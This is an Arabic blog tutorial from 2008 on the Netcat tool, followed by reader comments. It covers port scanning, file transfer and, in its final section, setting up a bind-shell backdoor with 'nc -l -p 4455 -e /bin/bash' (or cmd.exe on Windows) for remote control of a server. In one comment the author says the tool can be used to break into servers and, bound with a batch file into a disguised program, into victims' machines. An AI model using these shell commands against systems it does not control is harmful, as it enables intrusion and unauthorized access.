شرح أداة Netcat - The Swiss Army Knife

كتب بتاريخ: Jan 22nd, 2008 | بواسطة: Br4v3-H34r7

السلام عليكم ورحمة الله وبركاته

netcat-logo.png
Netcat من أفضل الأدوات التي عرفها الـ Hackers تقوم هذه الأداة
بارسال واستقبال البيانات باستعمال الـ TCP & UDP Protocols
وهي بالمرتبة الرابعة في قائمة Top 100 Network Security Tools

استخدامات الـ Netcat متعددة وخطيرة فتستطيع استعمالها لكثير من الأمور منها

فحص المنافذ المفتوحة في السيرفر

تستطيع أداة الـ Netcat فحص المنافذ المفتوحة بالسيرفر ولكن الـ Nmap
أفضل وأسرع منها في ذلك << سأضع شرح لها قريبا ان شاء الله, وللقيام
بهذه العملية نستعمل الأمر

nc -v -w1 SERVER-IP -z FromPort-ToPort

أما بالنسبة للخيارات التي استخدمناها
-v لجعل الأداة تعمل بشكل الـ verbose mode أي لرؤية ماذا يحدث
-w لتحديدي الـ Time out لكل اتصال وهنا حددناه ثانية واحدة
-z تستعمل في عملية فحص المنافذ

مثال على ذلك

nc -v -w1 64.233.183.147 -z 1-100

ولفحص أكثر من نطاق منافذ نستعمل الأمر

nc -v -w1 -z 64.233.183.147 -z 1-100 400-500

ملاحظة: 64.233.183.147 هو IP موقع Google

نقل الملفات بين جهازك والسيرفر

من ميزات الـ Netcat أنها تستطيع نقل الملفات بين جهازين
وللقيام بهذه العملية نطبق الأمر في الجهاز المرسل

nc SERVER-IP PORT < FILE

ونطبق الأمر في الجهاز المستقبل

nc -l -p PORT > FILE

مثال لارسال ملف اسمه data.txt عن طريق البورت 5555 مثلا

nc 192.168.0.45 5555 < data.txt

أما بالنسبة لاستقبال ملف data.txt عن طريق المنفذ 5555 ننفذ الأمر

nc -l -p 5555 > data.txt

جعل الـ Netcat تعمل كـ Backdoor

هذه أخطر استعمالات الـ Netcat لأنه يشكل خطورة على الجهاز و السيرفر بشكل عام
حيث تمتاز أداة الـ Netcat بخاصية ارسال البيانات الى برنامج معين مثل cmd.exe
في ويندوز و /bin/bash في لينوكس مما يجعلك تستطيع تطبيق أوامر على السيرفر
والتحكم به بشكل كامل يتم تنفيذ هذه الخاصية باستعمال الأمر

nc -l -p PORT -e PROGRAM

مع اضافة -d و -L في ويندوز ليصبح الأمر

nc -l -p PORT -d -e PROGRAM -L

مثال على هذه الخاصية نقوم بتطبيق الأمر

nc -l -p 4455 -e /bin/bash

على السيرفر اذا كان السيرفر ويندوز نطبق نفس الأمر مع اضافة -L و -d مع القيام بتغيير
الـ /bin/bash الى cmd.exe ليصبح الأمر بالشكل

nc -l -p 4455 -e -d cmd.exe -L

وللاتصال بالسيرفر نطبق الأمر

nc -v -n SERVER-IP 4455

وبهذه الطريقة نستطيع ارسال أوامر للتحكم بالسيرفر ولمعرفة جميع خصائص هذه الأداة نفذ الأمر

nc -h

تحميل أداة Netcat لنظام لينوكس | تحميل أداة Netcat لنظام ويندوز

ان أصبت فمن الله وان أخطأت فمن نفسي ومن الشيطان

أرجو أن ينال الشرح اعجابكم
تحياتي Br4v3-H34r7.

التصنيف: Hacking & Security | عدد المشاهدات 3,655 | عدد التعليقات 25

رابط التعقيبات التعليقات RSS
x

أرسل الى صديق





أرسل الموضوع
del.icio.us digg reddit stumbleupon facebook technorati google yahoo

التعليقات
  1. 1- الطارق كتب بتاريخ: 22 Jan 2008 الساعة: 6:27 pm

    فعلاً اداة النت كات جبارة وهي تختصر الكثير من الوقت

    يعطيك العافية على الموضوع واستمر بارك الله فيك

  2. 2- Br4v3-H34r7 كتب بتاريخ: 22 Jan 2008 الساعة: 6:49 pm

    يا هلا فيك أخوي طارق الله يعافيك
    وماشاء الله عليك دائما منور المدونة

  3. 3- محمد كتب بتاريخ: 21 Mar 2008 الساعة: 5:53 pm

    شكرا لك

  4. 4- NsA كتب بتاريخ: 02 Apr 2008 الساعة: 6:18 pm

    موقعك بدون اي مجامله في غاية الروعه

    واصل يابطل

    وربي يوفقك دنيا واخره

  5. 5- thrkam كتب بتاريخ: 08 Apr 2008 الساعة: 7:26 am

    مشكور يا جميل وانة استخدمة للنيت ورك حيث يقزم بسجب الماكات شكرا ليك باي

  6. 6- CASATAWY كتب بتاريخ: 30 Apr 2008 الساعة: 5:20 am

    بصراحة الأداة ممتازة بس ماينفعش تستخدم باكدور لأن علشان نستخدمها لازم الضحية يفعلها وبالتالى صعب اقوله تعالى علشان اخترق جهازك !!!!!!!!!

    واشكرك على المدونة ممتازة

  7. 7- Br4v3-H34r7 كتب بتاريخ: 30 Apr 2008 الساعة: 1:16 pm

    @محمد: العفو وان شاء الله تكون استفدت

    @NsA: شكرا أخوي على كلامك الجميل وعلى الدعوات الأجمل وان شاء الله يوفقنا أجمعين

    @thrkam: ان شاء الله يكون عجبك الموضوع وهلا فيك في المدونة

    @CASATAWY: طبعا أنت مش حتخترق فيها جهاز! هذا شغل أطفال وفي برامج أفضل لهذه المهمة لكن netcat ممكن تستخدم في اختراق السيرفرات والحصول على Shell ويمكن استخدامها في اختراق الأجهزة أيضا اذا استعنا بملف bat ينفذ الأوامر وبرمجنا برنامج بالفيجول بيزك مثلا يدمج الملفين وسابقا شرحت الطريقة كاملة بالفيديو ولكن قبل ما أفتح المدونة.. ممكن أرجع أعيد الشرح وأكتب عنه موضوع جديد قريبا.. دمت بود

  8. 8- learn&learn كتب بتاريخ: 26 May 2008 الساعة: 1:56 pm

    والله اخي ما ارعف كيف اجازيك بس استمر جزاك الله الف خير واي شي تحتاجه ان شاء الله احنا موجودين بس ما اعتقد انت تحتاج شي يااستاذ

  9. 9- Br4v3-H34r7 كتب بتاريخ: 27 May 2008 الساعة: 11:57 am

    أخي learn&learn لاداعي لكملة “استاذ” فماحدا استاذ هنا وماحدا ولد كذلك شكرا على عرضك واذا لزمني شيء بيوم من الأيام سأخبرك

  10. 10- مشمش كتب بتاريخ: 01 Jun 2008 الساعة: 7:14 pm

    برنامج النت كت مش عارف احمله ممكن شرح التحميل منين وشكرا

الصفحات: [1] 2 3 » أظهر جميع التعليقات
المشاركة بتعليق

               

Arabnix - Linux Professional Solutions

أعلى الصفحة